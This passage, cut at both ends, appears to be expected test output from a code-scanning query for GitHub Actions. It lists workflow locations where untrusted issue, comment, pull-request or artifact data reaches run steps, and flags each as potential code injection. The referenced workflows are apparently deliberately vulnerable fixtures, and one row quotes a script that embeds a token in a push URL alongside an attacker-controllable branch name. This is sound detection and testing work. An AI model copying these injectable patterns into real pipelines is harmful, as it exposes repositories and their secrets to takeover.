pull_request_target | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be 